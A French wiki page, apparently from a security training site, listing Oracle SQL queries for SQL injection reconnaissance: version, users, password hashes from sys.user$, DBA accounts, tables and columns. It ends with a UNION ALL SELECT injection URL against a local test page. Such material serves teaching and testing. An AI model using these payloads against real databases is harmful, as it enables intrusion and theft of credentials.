1.1 Exemples pratiques PL/SQL

Version

 SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
 SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
 SELECT version FROM v$instance;

Current User

 SELECT user FROM dual

List Users

 SELECT username FROM all_users ORDER BY username;
 SELECT name FROM sys.user$; — priv

List Password Hashes

 SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus tells you if acct is locked
 SELECT name,spare4 FROM sys.user$ — priv, 11g

List DBA Accounts

 SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles

List Databases

 SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
 – Also query TNS listener for other databases.  See tnscmd (services | status).

List Columns

 SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
 SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

List Tables

 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;

String Concatenation

 SELECT ‘A’ || ‘B’ FROM dual; — returns AB

Location of DB files

 SELECT name FROM V$DATAFILE;

Default/System Databases

 SYSTEM
 SYSAUX

Exemple d'intégration listant les users

 http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL

1.1 Exemples pratiques PL/SQL

Menu de navigation

Outils personnels

Espaces de noms

Variantes

Affichages

Plus

Rechercher

Navigation

Outils